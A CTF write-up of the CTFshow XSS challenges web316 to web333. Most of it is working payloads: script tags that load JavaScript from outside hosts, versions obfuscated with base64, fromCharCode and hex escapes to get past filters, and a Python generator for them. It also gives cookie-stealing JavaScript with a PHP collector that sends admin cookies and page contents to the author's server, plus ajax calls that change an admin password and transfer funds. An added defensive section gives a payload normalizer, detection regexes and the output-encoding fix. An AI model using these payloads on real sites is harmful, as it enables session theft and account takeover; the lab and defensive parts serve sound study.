
[CTFSHOW] XSS getting started (casual notes)

Table of contents

  • Preface
  • web316
  • web317-319
  • All-in payload for some of the earlier challenges
  • web320
  • web321
  • web322-324 filter ;
  • web325 filters .
  • web326 filters parentheses
  • Generating the String.fromCharCode payload used above
  • web327
  • web328
  • web329
  • web330
  • web331
  • web332-333
  • Reference links

Preface

The payloads below need to be URL-decoded by you. Most of them use an XSS platform for blind XSS (the link is at the very bottom). Where spaces are filtered, use / instead. Note that this may not be a proper writeup: I forgot to back it up earlier, so make do with it and work out the underlying principles yourselves.

web316

http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3E

web317-319

http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly95NHRhY2tlci50b3AvaGFjay5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+autofocus%3E

All-in payload for some of the earlier challenges

<input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzOC5jYy8ySEpJIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>

web320

http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32,60,115,67,114,73,112,116,32,115,114,67,61,47,47,120,115,46,115,98,47,89,84,85,104,62,60,47,115,67,82,105,112,84,62));"

web321

http://cc9e301d-d32a-4540-932a-6cd28d5d5acc.chall.ctf.show/?msg=<body/onload="document.write(String.fromCharCode(32));document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));"

web322-324 filter ;

<body/onload='document.write(String.fromCharCode(60));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(114));document.write(String.fromCharCode(73));document.write(String.fromCharCode(112));document.write(String.fromCharCode(116));document.write(String.fromCharCode(32));document.write(String.fromCharCode(115));document.write(String.fromCharCode(114));document.write(String.fromCharCode(67));document.write(String.fromCharCode(61));document.write(String.fromCharCode(47));document.write(String.fromCharCode(47));document.write(String.fromCharCode(120));document.write(String.fromCharCode(115));document.write(String.fromCharCode(46));document.write(String.fromCharCode(115));document.write(String.fromCharCode(98));document.write(String.fromCharCode(47));document.write(String.fromCharCode(89));document.write(String.fromCharCode(84));document.write(String.fromCharCode(85));document.write(String.fromCharCode(104));document.write(String.fromCharCode(62));document.write(String.fromCharCode(60));document.write(String.fromCharCode(47));document.write(String.fromCharCode(115));document.write(String.fromCharCode(67));document.write(String.fromCharCode(82));document.write(String.fromCharCode(105));document.write(String.fromCharCode(112));document.write(String.fromCharCode(84));document.write(String.fromCharCode(62));'>

web325 filters .

<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

web326 filters parentheses

<body/onload=eval("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x36\x30\x2c\x31\x31\x35\x2c\x36\x37\x2c\x31\x31\x34\x2c\x37\x33\x2c\x31\x31\x32\x2c\x31\x31\x36\x2c\x33\x32\x2c\x31\x31\x35\x2c\x31\x31\x34\x2c\x36\x37\x2c\x36\x31\x2c\x34\x37\x2c\x34\x37\x2c\x31\x32\x30\x2c\x31\x31\x35\x2c\x34\x36\x2c\x31\x31\x35\x2c\x39\x38\x2c\x34\x37\x2c\x38\x39\x2c\x38\x34\x2c\x38\x35\x2c\x31\x30\x34\x2c\x36\x32\x2c\x36\x30\x2c\x34\x37\x2c\x31\x31\x35\x2c\x36\x37\x2c\x38\x32\x2c\x31\x30\x35\x2c\x31\x31\x32\x2c\x38\x34\x2c\x36\x32\x29\x29\x3b")>

Generating the String.fromCharCode payload used above

# Build the comma-separated char-code list (web320) and the one-call-per-character
# document.write chain (web321/web322) from a plain string.
a = "<sCrIpt srC=//xs.sb/YTUh></sCRipT>"
res = ''
res2 = ''
for i in a:
  tmp = ord(i)
  res += str(tmp)
  res += ","
  res2 += f"document.write(String.fromCharCode({tmp}));"
print(res.rstrip(","))
print(res2)

# Turn the hex encoding of the payload into \xNN escapes for the eval("...") form (web325/web326).
a = "646f63756d656e742e777269746528537472696e672e66726f6d43686172436f64652836302c3131352c36372c3131342c37332c3131322c3131362c33322c3131352c3131342c36372c36312c34372c34372c3132302c3131352c34362c3131352c39382c34372c38392c38342c38352c3130342c36322c36302c34372c3131352c36372c38322c3130352c3131322c38342c363229293b"
res = ''
for k in range(0, len(a), 2):
  res += r"\x" + a[k:k + 2]
print(res)
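From the defender's side, the same layering is what a filter or log-review rule has to see through. As an added example (not part of the original writeup), a small Python normalizer that undoes the encodings used in web320 to web326 (URL encoding, \xNN escapes, String.fromCharCode lists and the one-character-per-call document.write chain) so a plain rule can match the HTML the payload eventually produces, next to the output-encoding fix that makes blacklisting ; . ( ) unnecessary; the sample payloads and the host name are constructed.

```python
import html
import re
from urllib.parse import unquote_plus

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')                     # "\x64\x6f..." (web325/326)
FROM_CHAR_CODE = re.compile(r'String\.fromCharCode\(([\d\s,]*)\)')   # char-code list (web320/322)
DOC_WRITE = re.compile(r'document\.write\(([^()]*)\)\s*;?')          # one-char-per-call chain (web321)

def _hex(m):
    return chr(int(m.group(1), 16))

def _char_codes(m):
    return ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip())

def normalize(payload, max_rounds=6):
    """Peel URL, entity, hex, fromCharCode and document.write layers until nothing changes.
    Base64 passed indirectly via an attribute (eval(atob(this.id)), web317) is not undone."""
    s = payload
    for _ in range(max_rounds):
        before = s
        s = unquote_plus(s)                 # %3C -> <, '+' -> space, as the msg parameter is decoded
        s = html.unescape(s)
        s = HEX_ESCAPE.sub(_hex, s)
        s = FROM_CHAR_CODE.sub(_char_codes, s)
        s = DOC_WRITE.sub(lambda m: m.group(1), s)
        if s == before:
            break
    return s

INDICATORS = [
    ('event-handler attribute', re.compile(r'<\w+[\s/]+on\w+\s*=', re.I)),  # <body/onload=, <input onfocus=
    ('script tag', re.compile(r'<script\b', re.I)),                         # mixed case <sCrIpt> as well
    ('eval', re.compile(r'\beval\s*\(')),
]

def classify(payload):
    return [name for name, rx in INDICATORS if rx.search(normalize(payload))]

def render_msg(msg):
    """The real fix for the reflected msg parameter: encode on output instead of blacklisting characters."""
    return '<p>' + html.escape(msg, quote=True) + '</p>'

# Constructed samples shaped like the page's payloads (the host is a placeholder, not the challenge's).
SAMPLES = {
    'web316-style': '%3Cscript+src%3D%22http%3A%2F%2Fattacker.example%2Fhack.js%22%3E%3C%2Fscript%3E',
    'web320-style': '<body/onload="document.write(String.fromCharCode(60,115,67,114,73,112,116,62));">',
    'web321-style': ''.join(f'document.write(String.fromCharCode({c}));' for c in (60, 115, 99, 114, 105, 112, 116, 62)),
    'web325-style': '<body/onload=eval("' + ''.join(f'\\x{ord(c):02x}' for c in 'document.write(String.fromCharCode(60,115,99,114,105,112,116,62));') + '")>',
}
```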

web327

Note that the recipient is admin; there is no filtering.

web328

Host it yourself; the point is to steal the admin's cookie.

Write a JS file:

var img = new Image();
img.src = "http://y4tacker.top/index.php?q="+document.cookie
document.body.append(img);      

Below is index.php:

<?php 
  $cookie = $_GET['q'];
  $myFile = "cookie.txt";
  file_put_contents($myFile, $cookie, FILE_APPEND);
?>      

Register with

<script src=your js address></script>

Then replace the cookie in your browser with this one and visit the user management page.

web329

From this challenge on, the group owner invalidates the cookie before it is sent to you, so switch approach and grab page elements instead.

Host it yourself:

var img = new Image();
img.src = "http://y4tacker.top/index.php?q=" + document.querySelector('#top > div.layui-container > div:nth-child(4) > div > div.layui-table-box > div.layui-table-body.layui-table-main').textContent;
document.body.append(img);

index.php is the same as before:

<?php
  $cookie = $_GET['q'];
  $myFile = "cookie.txt";
  file_put_contents($myFile, $cookie, FILE_APPEND);
?>

web330

The previous challenge revealed that the password is admin*******, so just change the password.

$.ajax({url: "http://127.0.0.1/api/change.php?p=111111", success: function(result){}});

web331

$.ajax({
  url: "http://127.0.0.1/api/change.php",
  method: "POST",
  data: {
    'p': '111111'
  },
  cache: false,
  success: function(res){}
});

web332-333

One is a GET request and the other a POST request; the payload is similar to web331. The main idea is to transfer money from admin to a new account you registered yourself, then buy the flag. You may also notice the challenge has a small bug: transferring money to yourself also makes the balance keep growing.

$.ajax({
  url: "http://127.0.0.1/api/amount.php",
  method: "POST",
  data: {
    'u': 'y4tacker',
    'a': 10000
  },
  cache: false,
  success: function(res){}
});

Reference links